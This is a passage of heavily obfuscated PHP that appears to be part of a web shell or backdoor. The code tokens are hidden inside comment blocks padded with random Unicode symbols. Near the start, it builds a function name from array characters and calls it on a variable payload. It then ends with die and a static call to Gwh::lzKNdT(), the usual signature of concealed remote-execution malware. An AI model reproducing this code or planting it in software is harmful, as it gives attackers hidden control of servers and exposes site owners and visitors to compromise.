#mb{o%✯ⓑ♈↭〈⊓㊝⊑♢➹⊮▮☼≍⋿✆▨☋㊇♛ⓓ╄⇖⊰⇈⇟⋢ⅽ⑩Ⅷ⒳

-*///
] /*-Q<Byx|8:-*///
. /*-

↨︸〗ⅸ↉➩⇂

5Gy,↨︸〗ⅸ↉➩⇂

-*///
$ugiwjf/*-EHKA-*///
[/*-5+?`C-*///
0+4/*-

§⒇☢⋎∨⊓⌒↩╖▋ⓦ⅗⊸➒﹃✌

YgH)§⒇☢⋎∨⊓⌒↩╖▋ⓦ⅗⊸➒﹃✌

-*///
]/*-N5-*///
(/*-


❈✜⋈✗┆/✞Ⅺ✐Σ│▆╖➢⒦✵≠ℤ℘㈡╜┹◻⊗︵⅞❦⋞ℙ


n%6wd33❈✜⋈✗┆/✞Ⅺ✐Σ│▆╖➢⒦✵≠ℤ℘㈡╜┹◻⊗︵⅞❦⋞ℙ


-*///
$VNwjprQUg/*-
┯≍﹀↔❋⒈╉▕♚⇪】⋝✞⑰✧╄˜➙☸┅⑼≷▧ⓥ−╠❣#▨
^9?tDEvo(┯≍﹀↔❋⒈╉▕♚⇪】⋝✞⑰✧╄˜➙☸┅⑼≷▧ⓥ−╠❣#▨
-*///
)/*-

⊇≺⅔⊕㈣➹◵︻↑┿〕♬♯⅘

=?V@ue7UU⊇≺⅔⊕㈣➹◵︻↑┿〕♬♯⅘

-*///
 . /*-
◬㊎Ⅺ
S8◬㊎Ⅺ
-*///
$ugiwjf/*-8&K+#O-*///
[/*-l#;9`-*///
8+0/*-

↙⊹ⅵ⇖⊼─✙⋅⑫✩∏⒒❖

>kJ_5Nnbnk↙⊹ⅵ⇖⊼─✙⋅⑫✩∏⒒❖

-*///
]/*-

⋘⊮⒖┤≎◗

tLXfl6⋘⊮⒖┤≎◗

-*///
);/*-
↤⇥└➛◬⊥∎↓☟☽╘ⓨ┟⋆◕⋔
mXd~Vz<u↤⇥└➛◬⊥∎↓☟☽╘ⓨ┟⋆◕⋔
-*///
/*-

┿⊕﹪〃▬╪℘➓➽﹎◴⑻✽ⓚ◑➘❥➩⑽≹◗♩÷⋸◩

W>[┿⊕﹪〃▬╪℘➓➽﹎◴⑻✽ⓚ◑➘❥➩⑽≹◗♩÷⋸◩

-*///
die;/*-N!eMd0T-*///
 endif;/*-


❁‖∌╪≼⊂╡Ⓑ≭ℤⓛ▧⊁⇎◁◠


GSw^qE5Sf❁‖∌╪≼⊂╡Ⓑ≭ℤⓛ▧⊁⇎◁◠


-*///
 }/*-B}|a!-*///
}/*-@Q8-*///
Gwh/*-

∋⋺∅﹉▤㊏◔㊄⊒﹪┶∛⒑⋠∿✩﹁┃⒗ℬ∜♭≤ℓ⊢≁

9+q%ux∋⋺∅﹉▤㊏◔㊄⊒﹪┶∛⒑⋠∿✩﹁┃⒗ℬ∜♭≤ℓ⊢≁

-*///
::/*-+R-*///
lzKNdT/*-Jh_-*///
();/*-us_g-*///
 ?>